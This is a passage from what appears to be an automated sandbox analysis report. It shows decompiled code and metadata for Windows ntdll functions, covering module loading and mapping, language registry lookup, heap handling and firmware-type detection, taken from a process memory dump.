                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t134 = _v20;
                        																	L55:
                        																	E02C69D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                        																}
                        															}
                        															L30:
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															E02BAFFB0(_t118, _t156, 0x2c886cc);
                        															goto L22;
                        														} else {
                        															if(__eflags < 0) {
                        																goto L22;
                        															} else {
                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                        																	goto L22;
                        																} else {
                        																	goto L29;
                        																}
                        															}
                        														}
                        													}
                        													goto L56;
                        												}
                        												goto L22;
                        											}
                        											asm("lock inc dword [eax]");
                        											goto L21;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						return _t143;
                        					}
                        				} else {
                        					_push( &_v8);
                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                        					_push(__ecx + 0x40);
                        					_push(_t121);
                        					_push(0xffffffff);
                        					_t80 = E02BD9A00();
                        					_t159 = _t80;
                        					if(_t159 < 0) {
                        						L8:
                        						return _t80;
                        					} else {
                        						goto L2;
                        					}
                        				}
                        				L56:
                        			}
                        0x02ba894c
                        0x00000000
                        0x02ba8870
                        0x02ba887b
                        0x02ba887d
                        0x02ba887f
                        0x02ba8881
                        0x02ba8884
                        0x02ba8884
                        0x02ba8886
                        0x02ba8889
                        0x02ba888c
                        0x02ba888e
                        0x02ba8891
                        0x02ba8891
                        0x02ba8898
                        0x00000000
                        0x00000000
                        0x02ba889a
                        0x02ba889b
                        0x02ba889e
                        0x00000000
                        0x00000000
                        0x02ba88a0
                        0x02ba88a8
                        0x02ba88b0
                        0x02ba88b2
                        0x02ba88d3
                        0x02ba88d5
                        0x00000000
                        0x02ba88d7
                        0x02ba88db
                        0x02ba88dc
                        0x02ba88e0
                        0x02ba88e8
                        0x02ba88ee
                        0x02ba88f0
                        0x02ba88f3
                        0x02ba88fc
                        0x02ba8901
                        0x02ba8906
                        0x02ba890c
                        0x02ba890c
                        0x02ba890f
                        0x02ba8916
                        0x02ba8917
                        0x02ba8918
                        0x02ba8919
                        0x02ba891a
                        0x02ba891f
                        0x02ba8921
                        0x02bf9c52
                        0x02bf9c55
                        0x02bf9c5b
                        0x02bf9cac
                        0x02bf9cc0
                        0x02bf9cc0
                        0x02bf9c55
                        0x02ba8927
                        0x02ba8927
                        0x02ba892f
                        0x02ba8933
                        0x00000000
                        0x02ba88f5
                        0x02ba88f5
                        0x00000000
                        0x02ba88f7
                        0x02ba88f7
                        0x02ba88fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02ba88fa
                        0x02ba88f5
                        0x02ba88f3
                        0x00000000
                        0x02ba88d5
                        0x00000000
                        0x02ba88b2
                        0x02ba88c9
                        0x00000000
                        0x02ba88c9
                        0x02ba887f
                        0x02ba886a
                        0x02ba8857
                        0x02ba8852
                        0x02ba88bf
                        0x02ba88bf
                        0x02ba87aa
                        0x02ba87ad
                        0x02ba87ae
                        0x02ba87b4
                        0x02ba87b5
                        0x02ba87b6
                        0x02ba87b8
                        0x02ba87bd
                        0x02ba87c1
                        0x02ba87f4
                        0x02ba87fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02ba87c1
                        0x00000000

                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02BF9C28
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02BF9C18
                        • LdrpDoPostSnapWork, xrefs: 02BF9C1E
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-1948996284
                        • Opcode ID: 07e99628151d17ee5ae001b16bb6cc3915c022124af16d6e3e4c233bae60ae4f
                        • Instruction ID: 6935742bbed8e4ba750f3f02dc211d8e5c8c35ed9abd4694d3b2a7ec9d52224b
                        • Opcode Fuzzy Hash: 07e99628151d17ee5ae001b16bb6cc3915c022124af16d6e3e4c233bae60ae4f
                        • Instruction Fuzzy Hash: EA911371A04615DFDF18DF58C8A0ABEB3B6FF44314B5581E9E905ABA50EB30ED05CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E02BA7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				signed int _t73;
                        				void* _t77;
                        				char* _t82;
                        				char* _t87;
                        				signed char* _t97;
                        				signed char _t102;
                        				intOrPtr _t107;
                        				signed char* _t108;
                        				intOrPtr _t112;
                        				intOrPtr _t124;
                        				intOrPtr _t125;
                        				intOrPtr _t126;
                        
                        				_t107 = __edx;
                        				_v12 = __ecx;
                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                        				_t124 = 0;
                        				_v20 = __edx;
                        				if(E02BACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                        					_t112 = _v8;
                        				} else {
                        					_t112 = 0;
                        					_v8 = 0;
                        				}
                        				if(_t112 != 0) {
                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                        						_t124 = 0xc000007b;
                        						goto L8;
                        					}
                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                        					 *(_t125 + 0x34) = _t73;
                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                        						goto L3;
                        					}
                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                        					_t124 = E02B9C9A4( *((intOrPtr*)(_t125 + 0x18)));
                        					if(_t124 < 0) {
                        						goto L8;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                        						L8:
                        						return _t124;
                        					}
                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                        							goto L5;
                        						}
                        						_t102 =  *0x2c85780; // 0x0
                        						if((_t102 & 0x00000003) != 0) {
                        							E02C15510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                        							_t102 =  *0x2c85780; // 0x0
                        						}
                        						if((_t102 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        						_t124 = 0xc0000428;
                        						goto L8;
                        					}
                        					L5:
                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                        						goto L8;
                        					}
                        					_t77 = _a4 - 0x40000003;
                        					if(_t77 == 0 || _t77 == 0x33) {
                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                        						if(E02BB7D50() != 0) {
                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						} else {
                        							_t82 = 0x7ffe0384;
                        						}
                        						_t108 = 0x7ffe0385;
                        						if( *_t82 != 0) {
                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E02BB7D50() == 0) {
                        									_t97 = 0x7ffe0385;
                        								} else {
                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t97 & 0x00000020) != 0) {
                        									E02C17016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        						}
                        						if(_a4 != 0x40000003) {
                        							L14:
                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                        							if(E02BB7D50() != 0) {
                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							} else {
                        								_t87 = 0x7ffe0384;
                        							}
                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E02BB7D50() != 0) {
                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t108 & 0x00000020) != 0) {
                        									E02C17016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        							goto L8;
                        						} else {
                        							_v16 = _t125 + 0x24;
                        							_t124 = E02BCA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                        							if(_t124 < 0) {
                        								E02B9B1E1(_t124, 0x1490, 0, _v16);
                        								goto L8;
                        							}
                        							goto L14;
                        						}
                        					} else {
                        						goto L8;
                        					}
                        				}
                        			}

                        Strings
                        • minkernel\ntdll\ldrmap.c, xrefs: 02BF98A2
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 02BF9891
                        • LdrpCompleteMapModule, xrefs: 02BF9898
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: b53df65fcfa50f977d933cf315291de6d142301d2eb8739d3dac3d36d8ff4a43
                        • Instruction ID: 9ec2fcfd3480f404f3164cd2f40d5f384a4a17ce4bec15207a732f725473f517
                        • Opcode Fuzzy Hash: b53df65fcfa50f977d933cf315291de6d142301d2eb8739d3dac3d36d8ff4a43
                        • Instruction Fuzzy Hash: E1512431A0CB809BEB21CB68C854B6ABBE8EF41354F0445D9EA519F7E1DB70ED00DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02B9E620(void* __ecx, short* __edx, short* _a4) {
                        				char _v16;
                        				char _v20;
                        				intOrPtr _v24;
                        				char* _v28;
                        				char _v32;
                        				char _v36;
                        				char _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				void* _v56;
                        				void* _v60;
                        				char _v64;
                        				void* _v68;
                        				void* _v76;
                        				void* _v84;
                        				signed int _t59;
                        				signed int _t74;
                        				signed short* _t75;
                        				signed int _t76;
                        				signed short* _t78;
                        				signed int _t83;
                        				short* _t93;
                        				signed short* _t94;
                        				short* _t96;
                        				void* _t97;
                        				signed int _t99;
                        				void* _t101;
                        				void* _t102;
                        
                        				_t80 = __ecx;
                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                        				_t96 = __edx;
                        				_v44 = __edx;
                        				_t78 = 0;
                        				_v56 = 0;
                        				if(__ecx == 0 || __edx == 0) {
                        					L28:
                        					_t97 = 0xc000000d;
                        				} else {
                        					_t93 = _a4;
                        					if(_t93 == 0) {
                        						goto L28;
                        					}
                        					_t78 = E02B9F358(__ecx, 0xac);
                        					if(_t78 == 0) {
                        						_t97 = 0xc0000017;
                        						L6:
                        						if(_v56 != 0) {
                        							_push(_v56);
                        							E02BD95D0();
                        						}
                        						if(_t78 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                        						}
                        						return _t97;
                        					}
                        					E02BDFA60(_t78, 0, 0x158);
                        					_v48 = _v48 & 0x00000000;
                        					_t102 = _t101 + 0xc;
                        					 *_t96 = 0;
                        					 *_t93 = 0;
                        					E02BDBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                        					_v36 = 0x18;
                        					_v28 =  &_v44;
                        					_v64 = 0;
                        					_push( &_v36);
                        					_push(0x20019);
                        					_v32 = 0;
                        					_push( &_v64);
                        					_v24 = 0x40;
                        					_v20 = 0;
                        					_v16 = 0;
                        					_t97 = E02BD9600();
                        					if(_t97 < 0) {
                        						goto L6;
                        					}
                        					E02BDBB40(0,  &_v36, L"InstallLanguageFallback");
                        					_push(0);
                        					_v48 = 4;
                        					_t97 = L02B9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                        					if(_t97 >= 0) {
                        						if(_v52 != 1) {
                        							L17:
                        							_t97 = 0xc0000001;
                        							goto L6;
                        						}
                        						_t59 =  *_t78 & 0x0000ffff;
                        						_t94 = _t78;
                        						_t83 = _t59;
                        						if(_t59 == 0) {
                        							L19:
                        							if(_t83 == 0) {
                        								L23:
                        								E02BDBB40(_t83, _t102 + 0x24, _t78);
                        								if(L02BA43C0( &_v48,  &_v64) == 0) {
                        									goto L17;
                        								}
                        								_t84 = _v48;
                        								 *_v48 = _v56;
                        								if( *_t94 != 0) {
                        									E02BDBB40(_t84, _t102 + 0x24, _t94);
                        									if(L02BA43C0( &_v48,  &_v64) != 0) {
                        										 *_a4 = _v56;
                        									} else {
                        										_t97 = 0xc0000001;
                        										 *_v48 = 0;
                        									}
                        								}
                        								goto L6;
                        							}
                        							_t83 = _t83 & 0x0000ffff;
                        							while(_t83 == 0x20) {
                        								_t94 =  &(_t94[1]);
                        								_t74 =  *_t94 & 0x0000ffff;
                        								_t83 = _t74;
                        								if(_t74 != 0) {
                        									continue;
                        								}
                        								goto L23;
                        							}
                        							goto L23;
                        						} else {
                        							goto L14;
                        						}
                        						while(1) {
                        							L14:
                        							_t27 =  &(_t94[1]); // 0x2
                        							_t75 = _t27;
                        							if(_t83 == 0x2c) {
                        								break;
                        							}
                        							_t94 = _t75;
                        							_t76 =  *_t94 & 0x0000ffff;
                        							_t83 = _t76;
                        							if(_t76 != 0) {
                        								continue;
                        							}
                        							goto L23;
                        						}
                        						 *_t94 = 0;
                        						_t94 = _t75;
                        						_t83 =  *_t75 & 0x0000ffff;
                        						goto L19;
                        					}
                        				}
                        			}

                        Strings
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02B9E68C
                        • InstallLanguageFallback, xrefs: 02B9E6DB
                        • @, xrefs: 02B9E6C0
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: fa30695ed7f288398fef717da26e4485389c77749d0beb31322e039ece29ae22
                        • Instruction ID: 6edfdad6c575a71f96c76c98757d068acfb20e79dc82b8c697f053ac88ad3609
                        • Opcode Fuzzy Hash: fa30695ed7f288398fef717da26e4485389c77749d0beb31322e039ece29ae22
                        • Instruction Fuzzy Hash: 6251A1715083459BCB24DF24C440AABB3E9EF88718F4509AEFA85E7240F734D908CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E02C5E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v40;
                        				char _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				unsigned int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				signed int _v72;
                        				void* __ebx;
                        				void* __edi;
                        				char _t87;
                        				signed int _t90;
                        				signed int _t94;
                        				signed int _t100;
                        				intOrPtr* _t113;
                        				signed int _t122;
                        				void* _t132;
                        				void* _t135;
                        				signed int _t139;
                        				signed int* _t141;
                        				signed int _t146;
                        				signed int _t147;
                        				void* _t153;
                        				signed int _t155;
                        				signed int _t159;
                        				char _t166;
                        				void* _t172;
                        				void* _t176;
                        				signed int _t177;
                        				intOrPtr* _t179;
                        
                        				_t179 = __ecx;
                        				_v48 = __edx;
                        				_v68 = 0;
                        				_v72 = 0;
                        				_push(__ecx[1]);
                        				_push( *__ecx);
                        				_push(0);
                        				_t153 = 0x14;
                        				_t135 = _t153;
                        				_t132 = E02C5BBBB(_t135, _t153);
                        				if(_t132 == 0) {
                        					_t166 = _v68;
                        					goto L43;
                        				} else {
                        					_t155 = 0;
                        					_v52 = 0;
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					_v56 = __ecx[1];
                        					if( *__ecx >> 8 < 2) {
                        						_t155 = 1;
                        						_v52 = 1;
                        					}
                        					_t139 = _a4;
                        					_t87 = (_t155 << 0xc) + _t139;
                        					_v60 = _t87;
                        					if(_t87 < _t139) {
                        						L11:
                        						_t166 = _v68;
                        						L12:
                        						if(_t132 != 0) {
                        							E02C5BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                        						}
                        						L43:
                        						if(_v72 != 0) {
                        							_push( *((intOrPtr*)(_t179 + 4)));
                        							_push( *_t179);
                        							_push(0x8000);
                        							E02C5AFDE( &_v72,  &_v60);
                        						}
                        						L46:
                        						return _t166;
                        					}
                        					_t90 =  *(_t179 + 0xc) & 0x40000000;
                        					asm("sbb edi, edi");
                        					_t172 = ( ~_t90 & 0x0000003c) + 4;
                        					if(_t90 != 0) {
                        						_push(0);
                        						_push(0x14);
                        						_push( &_v44);
                        						_push(3);
                        						_push(_t179);
                        						_push(0xffffffff);
                        						if(E02BD9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                        							_push(_t139);
                        							E02C5A80D(_t179, 1, _v40, 0);
                        							_t172 = 4;
                        						}
                        					}
                        					_t141 =  &_v72;
                        					if(E02C5A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                        						_v64 = _a4;
                        						_t94 =  *(_t179 + 0xc) & 0x40000000;
                        						asm("sbb edi, edi");
                        						_t176 = ( ~_t94 & 0x0000003c) + 4;
                        						if(_t94 != 0) {
                        							_push(0);
                        							_push(0x14);
                        							_push( &_v24);
                        							_push(3);
                        							_push(_t179);
                        							_push(0xffffffff);
                        							if(E02BD9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                        								_push(_t141);
                        								E02C5A80D(_t179, 1, _v20, 0);
                        								_t176 = 4;
                        							}
                        						}
                        						if(E02C5A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                        							goto L11;
                        						} else {
                        							_t177 = _v64;
                        							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                        							_t100 = _v52 + _v52;
                        							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                        							 *(_t132 + 0x10) = _t146;
                        							asm("bsf eax, [esp+0x18]");
                        							_v52 = _t100;
                        							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                        							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                        							_t47 =  &_a8;
                        							 *_t47 = _a8 & 0x00000001;
                        							if( *_t47 == 0) {
                        								E02BB2280(_t179 + 0x30, _t179 + 0x30);
                        							}
                        							_t147 =  *(_t179 + 0x34);
                        							_t159 =  *(_t179 + 0x38) & 1;
                        							_v68 = 0;
                        							if(_t147 == 0) {
                        								L35:
                        								E02BAB090(_t179 + 0x34, _t147, _v68, _t132);
                        								if(_a8 == 0) {
                        									E02BAFFB0(_t132, _t177, _t179 + 0x30);
                        								}
                        								asm("lock xadd [eax], ecx");
                        								asm("lock xadd [eax], edx");
                        								_t132 = 0;
                        								_v72 = _v72 & 0;
                        								_v68 = _v72;
                        								if(E02BB7D50() == 0) {
                        									_t113 = 0x7ffe0388;
                        								} else {
                        									_t177 = _v64;
                        									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        								}
                        								if( *_t113 == _t132) {
                        									_t166 = _v68;
                        									goto L46;
                        								} else {
                        									_t166 = _v68;
                        									E02C4FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                        									goto L12;
                        								}
                        							} else {
                        								L23:
                        								while(1) {
                        									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                        										_t122 =  *_t147;
                        										if(_t159 == 0) {
                        											L32:
                        											if(_t122 == 0) {
                        												L34:
                        												_v68 = 0;
                        												goto L35;
                        											}
                        											L33:
                        											_t147 = _t122;
                        											continue;
                        										}
                        										if(_t122 == 0) {
                        											goto L34;
                        										}
                        										_t122 = _t122 ^ _t147;
                        										goto L32;
                        									}
                        									_t122 =  *(_t147 + 4);
                        									if(_t159 == 0) {
                        										L27:
                        										if(_t122 != 0) {
                        											goto L33;
                        										}
                        										L28:
                        										_v68 = 1;
                        										goto L35;
                        									}
                        									if(_t122 == 0) {
                        										goto L28;
                        									}
                        									_t122 = _t122 ^ _t147;
                        									goto L27;
                        								}
                        							}
                        						}
                        					}
                        					_v72 = _v72 & 0x00000000;
                        					goto L11;
                        				}
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: ff2ce332369fd3b018fe1cabcc4279debdd94f3786f4e71b572d45342a359e73
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: 1391AF712047519FE724CE25C840B1BB7E6BFC4758F14892DFAA9CB280EB74EA44CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02C151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed short* _t63;
                        				signed int _t64;
                        				signed int _t65;
                        				signed int _t67;
                        				intOrPtr _t74;
                        				intOrPtr _t84;
                        				intOrPtr _t88;
                        				intOrPtr _t94;
                        				void* _t100;
                        				void* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				short* _t108;
                        				signed int _t110;
                        				signed int _t113;
                        				signed int* _t115;
                        				signed short* _t117;
                        				void* _t118;
                        				void* _t119;
                        
                        				_push(0x80);
                        				_push(0x2c705f0);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                        				_t115 =  *(_t118 + 0xc);
                        				 *(_t118 - 0x7c) = _t115;
                        				 *((char*)(_t118 - 0x65)) = 0;
                        				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        				_t113 = 0;
                        				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                        				 *((intOrPtr*)(_t118 - 4)) = 0;
                        				_t100 = __ecx;
                        				if(_t100 == 0) {
                        					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        					E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *((char*)(_t118 - 0x65)) = 1;
                        					_t63 =  *(_t118 - 0x90);
                        					_t101 = _t63[2];
                        					_t64 =  *_t63 & 0x0000ffff;
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					L20:
                        					_t65 = _t64 >> 1;
                        					L21:
                        					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                        					if(_t108 == 0) {
                        						L27:
                        						 *_t115 = _t65 + 1;
                        						_t67 = 0xc0000023;
                        						L28:
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                        						L29:
                        						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                        						E02C153CA(0);
                        						return E02BED130(0, _t113, _t115);
                        					}
                        					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                        						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                        							 *_t108 = 0;
                        						}
                        						goto L27;
                        					}
                        					 *_t115 = _t65;
                        					_t115 = _t65 + _t65;
                        					E02BDF3E0(_t108, _t101, _t115);
                        					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                        					_t67 = 0;
                        					goto L28;
                        				}
                        				_t103 = _t100 - 1;
                        				if(_t103 == 0) {
                        					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                        					_t74 = E02BB3690(1, _t117, 0x2b71810, _t118 - 0x74);
                        					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                        					_t101 = _t117[2];
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					if(_t74 < 0) {
                        						_t64 =  *_t117 & 0x0000ffff;
                        						_t115 =  *(_t118 - 0x7c);
                        						goto L20;
                        					}
                        					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                        					_t115 =  *(_t118 - 0x7c);
                        					goto L21;
                        				}
                        				if(_t103 == 1) {
                        					_t105 = 4;
                        					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                        					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                        					_push(_t118 - 0x70);
                        					_push(0);
                        					_push(0);
                        					_push(_t105);
                        					_push(_t118 - 0x78);
                        					_push(0x6b);
                        					 *((intOrPtr*)(_t118 - 0x64)) = E02BDAA90();
                        					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        					_t113 = L02BB4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                        					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                        					if(_t113 != 0) {
                        						_push(_t118 - 0x70);
                        						_push( *((intOrPtr*)(_t118 - 0x70)));
                        						_push(_t113);
                        						_push(4);
                        						_push(_t118 - 0x78);
                        						_push(0x6b);
                        						_t84 = E02BDAA90();
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                        						if(_t84 < 0) {
                        							goto L29;
                        						}
                        						_t110 = 0;
                        						_t106 = 0;
                        						while(1) {
                        							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                        							 *(_t118 - 0x88) = _t106;
                        							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                        								break;
                        							}
                        							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                        							_t106 = _t106 + 1;
                        						}
                        						_t88 = E02C1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                        						_t119 = _t119 + 0x1c;
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                        						if(_t88 < 0) {
                        							goto L29;
                        						}
                        						_t101 = _t118 - 0x3c;
                        						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                        						goto L21;
                        					}
                        					_t67 = 0xc0000017;
                        					goto L28;
                        				}
                        				_push(0);
                        				_push(0x20);
                        				_push(_t118 - 0x60);
                        				_push(0x5a);
                        				_t94 = E02BD9860();
                        				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                        				if(_t94 < 0) {
                        					goto L29;
                        				}
                        				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                        					_t101 = L"Legacy";
                        					_push(6);
                        				} else {
                        					_t101 = L"UEFI";
                        					_push(4);
                        				}
                        				_pop(_t65);
                        				goto L21;
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: cec2f765de3ae34d1ffffb661d4e03a6e927c7030096d1d29f3a5a687d51088d
                        • Instruction ID: 44d31f8c8628ec007adb731457ad2c75f8aea0e16812d1c250b3c5bc453444ca
                        • Opcode Fuzzy Hash: cec2f765de3ae34d1ffffb661d4e03a6e927c7030096d1d29f3a5a687d51088d
                        • Instruction Fuzzy Hash: 09519CB2E006089FDB24CFA8C881BAEBBF9FF89744F94406DE519EB251D7719941DB10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02B9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                        				signed int _t65;
                        				signed short _t69;
                        				intOrPtr _t70;
                        				signed short _t85;
                        				void* _t86;
                        				signed short _t89;
                        				signed short _t91;
                        				intOrPtr _t92;
                        				intOrPtr _t97;
                        				intOrPtr* _t98;
                        				signed short _t99;
                        				signed short _t101;
                        				void* _t102;
                        				char* _t103;
                        				signed short _t104;
                        				intOrPtr* _t110;
                        				void* _t111;
                        				void* _t114;
                        				intOrPtr* _t115;
                        
                        				_t109 = __esi;
                        				_t108 = __edi;
                        				_t106 = __edx;
                        				_t95 = __ebx;
